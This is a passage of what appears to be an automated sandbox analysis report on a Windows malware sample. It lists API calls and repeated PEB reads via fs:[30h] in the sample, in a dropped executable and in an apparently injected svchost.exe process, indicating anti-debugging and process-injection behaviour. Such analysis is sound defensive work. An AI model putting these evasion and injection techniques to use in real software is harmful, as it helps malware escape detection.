                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00417C33 LdrLoadDll,3_2_00417C33
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001A41FD BlockInput,0_2_001A41FD
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00133B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00133B4C
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00165CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00165CCC
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001AC304 LoadLibraryA,GetProcAddress,0_2_001AC304
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_011A8498 mov eax, dword ptr fs:[00000030h]0_2_011A8498
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_011A84F8 mov eax, dword ptr fs:[00000030h]0_2_011A84F8
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_011A6E08 mov eax, dword ptr fs:[00000030h]0_2_011A6E08
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_011D6538 mov eax, dword ptr fs:[00000030h]2_2_011D6538
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_011D64D8 mov eax, dword ptr fs:[00000030h]2_2_011D64D8
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_011D4E48 mov eax, dword ptr fs:[00000030h]2_2_011D4E48
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A30B mov eax, dword ptr fs:[00000030h]3_2_0306A30B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A30B mov eax, dword ptr fs:[00000030h]3_2_0306A30B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A30B mov eax, dword ptr fs:[00000030h]3_2_0306A30B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302C310 mov ecx, dword ptr fs:[00000030h]3_2_0302C310
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03050310 mov ecx, dword ptr fs:[00000030h]3_2_03050310
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03108324 mov eax, dword ptr fs:[00000030h]3_2_03108324
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03108324 mov ecx, dword ptr fs:[00000030h]3_2_03108324
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03108324 mov eax, dword ptr fs:[00000030h]3_2_03108324
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03108324 mov eax, dword ptr fs:[00000030h]3_2_03108324
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B035C mov eax, dword ptr fs:[00000030h]3_2_030B035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B035C mov eax, dword ptr fs:[00000030h]3_2_030B035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B035C mov eax, dword ptr fs:[00000030h]3_2_030B035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B035C mov ecx, dword ptr fs:[00000030h]3_2_030B035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B035C mov eax, dword ptr fs:[00000030h]3_2_030B035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B035C mov eax, dword ptr fs:[00000030h]3_2_030B035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FA352 mov eax, dword ptr fs:[00000030h]3_2_030FA352
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D8350 mov ecx, dword ptr fs:[00000030h]3_2_030D8350
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0310634F mov eax, dword ptr fs:[00000030h]3_2_0310634F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D437C mov eax, dword ptr fs:[00000030h]3_2_030D437C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302E388 mov eax, dword ptr fs:[00000030h]3_2_0302E388
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302E388 mov eax, dword ptr fs:[00000030h]3_2_0302E388
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302E388 mov eax, dword ptr fs:[00000030h]3_2_0302E388
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305438F mov eax, dword ptr fs:[00000030h]3_2_0305438F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305438F mov eax, dword ptr fs:[00000030h]3_2_0305438F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03028397 mov eax, dword ptr fs:[00000030h]3_2_03028397
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03028397 mov eax, dword ptr fs:[00000030h]3_2_03028397
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03028397 mov eax, dword ptr fs:[00000030h]3_2_03028397
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EC3CD mov eax, dword ptr fs:[00000030h]3_2_030EC3CD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A3C0 mov eax, dword ptr fs:[00000030h]3_2_0303A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A3C0 mov eax, dword ptr fs:[00000030h]3_2_0303A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A3C0 mov eax, dword ptr fs:[00000030h]3_2_0303A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A3C0 mov eax, dword ptr fs:[00000030h]3_2_0303A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A3C0 mov eax, dword ptr fs:[00000030h]3_2_0303A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A3C0 mov eax, dword ptr fs:[00000030h]3_2_0303A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030383C0 mov eax, dword ptr fs:[00000030h]3_2_030383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030383C0 mov eax, dword ptr fs:[00000030h]3_2_030383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030383C0 mov eax, dword ptr fs:[00000030h]3_2_030383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030383C0 mov eax, dword ptr fs:[00000030h]3_2_030383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B63C0 mov eax, dword ptr fs:[00000030h]3_2_030B63C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE3DB mov eax, dword ptr fs:[00000030h]3_2_030DE3DB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE3DB mov eax, dword ptr fs:[00000030h]3_2_030DE3DB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE3DB mov ecx, dword ptr fs:[00000030h]3_2_030DE3DB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE3DB mov eax, dword ptr fs:[00000030h]3_2_030DE3DB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D43D4 mov eax, dword ptr fs:[00000030h]3_2_030D43D4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D43D4 mov eax, dword ptr fs:[00000030h]3_2_030D43D4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]3_2_030403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]3_2_030403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]3_2_030403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]3_2_030403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]3_2_030403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]3_2_030403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]3_2_030403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]3_2_030403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304E3F0 mov eax, dword ptr fs:[00000030h]3_2_0304E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304E3F0 mov eax, dword ptr fs:[00000030h]3_2_0304E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304E3F0 mov eax, dword ptr fs:[00000030h]3_2_0304E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030663FF mov eax, dword ptr fs:[00000030h]3_2_030663FF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302823B mov eax, dword ptr fs:[00000030h]3_2_0302823B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B8243 mov eax, dword ptr fs:[00000030h]3_2_030B8243
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B8243 mov ecx, dword ptr fs:[00000030h]3_2_030B8243
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0310625D mov eax, dword ptr fs:[00000030h]3_2_0310625D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302A250 mov eax, dword ptr fs:[00000030h]3_2_0302A250
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036259 mov eax, dword ptr fs:[00000030h]3_2_03036259
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EA250 mov eax, dword ptr fs:[00000030h]3_2_030EA250
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EA250 mov eax, dword ptr fs:[00000030h]3_2_030EA250
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03034260 mov eax, dword ptr fs:[00000030h]3_2_03034260
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03034260 mov eax, dword ptr fs:[00000030h]3_2_03034260
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03034260 mov eax, dword ptr fs:[00000030h]3_2_03034260
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302826B mov eax, dword ptr fs:[00000030h]3_2_0302826B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E284 mov eax, dword ptr fs:[00000030h]3_2_0306E284
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E284 mov eax, dword ptr fs:[00000030h]3_2_0306E284
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B0283 mov eax, dword ptr fs:[00000030h]3_2_030B0283
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B0283 mov eax, dword ptr fs:[00000030h]3_2_030B0283
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B0283 mov eax, dword ptr fs:[00000030h]3_2_030B0283
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030402A0 mov eax, dword ptr fs:[00000030h]3_2_030402A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030402A0 mov eax, dword ptr fs:[00000030h]3_2_030402A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C62A0 mov eax, dword ptr fs:[00000030h]3_2_030C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C62A0 mov ecx, dword ptr fs:[00000030h]3_2_030C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C62A0 mov eax, dword ptr fs:[00000030h]3_2_030C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C62A0 mov eax, dword ptr fs:[00000030h]3_2_030C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C62A0 mov eax, dword ptr fs:[00000030h]3_2_030C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C62A0 mov eax, dword ptr fs:[00000030h]3_2_030C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A2C3 mov eax, dword ptr fs:[00000030h]3_2_0303A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A2C3 mov eax, dword ptr fs:[00000030h]3_2_0303A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A2C3 mov eax, dword ptr fs:[00000030h]3_2_0303A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A2C3 mov eax, dword ptr fs:[00000030h]3_2_0303A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A2C3 mov eax, dword ptr fs:[00000030h]3_2_0303A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031062D6 mov eax, dword ptr fs:[00000030h]3_2_031062D6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030402E1 mov eax, dword ptr fs:[00000030h]3_2_030402E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030402E1 mov eax, dword ptr fs:[00000030h]3_2_030402E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030402E1 mov eax, dword ptr fs:[00000030h]3_2_030402E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov eax, dword ptr fs:[00000030h]3_2_030DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov ecx, dword ptr fs:[00000030h]3_2_030DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov eax, dword ptr fs:[00000030h]3_2_030DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov eax, dword ptr fs:[00000030h]3_2_030DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov ecx, dword ptr fs:[00000030h]3_2_030DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov eax, dword ptr fs:[00000030h]3_2_030DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov eax, dword ptr fs:[00000030h]3_2_030DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov ecx, dword ptr fs:[00000030h]3_2_030DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov eax, dword ptr fs:[00000030h]3_2_030DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE10E mov ecx, dword ptr fs:[00000030h]3_2_030DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DA118 mov ecx, dword ptr fs:[00000030h]3_2_030DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DA118 mov eax, dword ptr fs:[00000030h]3_2_030DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DA118 mov eax, dword ptr fs:[00000030h]3_2_030DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DA118 mov eax, dword ptr fs:[00000030h]3_2_030DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F0115 mov eax, dword ptr fs:[00000030h]3_2_030F0115
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03060124 mov eax, dword ptr fs:[00000030h]3_2_03060124
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C4144 mov eax, dword ptr fs:[00000030h]3_2_030C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C4144 mov eax, dword ptr fs:[00000030h]3_2_030C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C4144 mov ecx, dword ptr fs:[00000030h]3_2_030C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C4144 mov eax, dword ptr fs:[00000030h]3_2_030C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C4144 mov eax, dword ptr fs:[00000030h]3_2_030C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302C156 mov eax, dword ptr fs:[00000030h]3_2_0302C156
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C8158 mov eax, dword ptr fs:[00000030h]3_2_030C8158
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036154 mov eax, dword ptr fs:[00000030h]3_2_03036154
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036154 mov eax, dword ptr fs:[00000030h]3_2_03036154
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104164 mov eax, dword ptr fs:[00000030h]3_2_03104164
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104164 mov eax, dword ptr fs:[00000030h]3_2_03104164
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03070185 mov eax, dword ptr fs:[00000030h]3_2_03070185
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EC188 mov eax, dword ptr fs:[00000030h]3_2_030EC188
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EC188 mov eax, dword ptr fs:[00000030h]3_2_030EC188
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D4180 mov eax, dword ptr fs:[00000030h]3_2_030D4180
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D4180 mov eax, dword ptr fs:[00000030h]3_2_030D4180
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B019F mov eax, dword ptr fs:[00000030h]3_2_030B019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B019F mov eax, dword ptr fs:[00000030h]3_2_030B019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B019F mov eax, dword ptr fs:[00000030h]3_2_030B019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B019F mov eax, dword ptr fs:[00000030h]3_2_030B019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302A197 mov eax, dword ptr fs:[00000030h]3_2_0302A197
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302A197 mov eax, dword ptr fs:[00000030h]3_2_0302A197
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302A197 mov eax, dword ptr fs:[00000030h]3_2_0302A197
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F61C3 mov eax, dword ptr fs:[00000030h]3_2_030F61C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F61C3 mov eax, dword ptr fs:[00000030h]3_2_030F61C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE1D0 mov eax, dword ptr fs:[00000030h]3_2_030AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE1D0 mov eax, dword ptr fs:[00000030h]3_2_030AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]3_2_030AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE1D0 mov eax, dword ptr fs:[00000030h]3_2_030AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE1D0 mov eax, dword ptr fs:[00000030h]3_2_030AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031061E5 mov eax, dword ptr fs:[00000030h]3_2_031061E5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030601F8 mov eax, dword ptr fs:[00000030h]3_2_030601F8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B4000 mov ecx, dword ptr fs:[00000030h]3_2_030B4000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]3_2_030D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]3_2_030D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]3_2_030D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]3_2_030D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]3_2_030D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]3_2_030D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]3_2_030D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]3_2_030D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304E016 mov eax, dword ptr fs:[00000030h]3_2_0304E016
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304E016 mov eax, dword ptr fs:[00000030h]3_2_0304E016
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304E016 mov eax, dword ptr fs:[00000030h]3_2_0304E016
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304E016 mov eax, dword ptr fs:[00000030h]3_2_0304E016
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302A020 mov eax, dword ptr fs:[00000030h]3_2_0302A020
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302C020 mov eax, dword ptr fs:[00000030h]3_2_0302C020
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C6030 mov eax, dword ptr fs:[00000030h]3_2_030C6030
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03032050 mov eax, dword ptr fs:[00000030h]3_2_03032050
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B6050 mov eax, dword ptr fs:[00000030h]3_2_030B6050
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305C073 mov eax, dword ptr fs:[00000030h]3_2_0305C073
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303208A mov eax, dword ptr fs:[00000030h]3_2_0303208A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030280A0 mov eax, dword ptr fs:[00000030h]3_2_030280A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C80A8 mov eax, dword ptr fs:[00000030h]3_2_030C80A8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F60B8 mov eax, dword ptr fs:[00000030h]3_2_030F60B8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F60B8 mov ecx, dword ptr fs:[00000030h]3_2_030F60B8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B20DE mov eax, dword ptr fs:[00000030h]3_2_030B20DE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0302A0E3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030380E9 mov eax, dword ptr fs:[00000030h]3_2_030380E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B60E0 mov eax, dword ptr fs:[00000030h]3_2_030B60E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302C0F0 mov eax, dword ptr fs:[00000030h]3_2_0302C0F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030720F0 mov ecx, dword ptr fs:[00000030h]3_2_030720F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306C700 mov eax, dword ptr fs:[00000030h]3_2_0306C700
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03030710 mov eax, dword ptr fs:[00000030h]3_2_03030710
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03060710 mov eax, dword ptr fs:[00000030h]3_2_03060710
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306C720 mov eax, dword ptr fs:[00000030h]3_2_0306C720
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306C720 mov eax, dword ptr fs:[00000030h]3_2_0306C720
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306273C mov eax, dword ptr fs:[00000030h]3_2_0306273C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306273C mov ecx, dword ptr fs:[00000030h]3_2_0306273C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306273C mov eax, dword ptr fs:[00000030h]3_2_0306273C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AC730 mov eax, dword ptr fs:[00000030h]3_2_030AC730
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306674D mov esi, dword ptr fs:[00000030h]3_2_0306674D
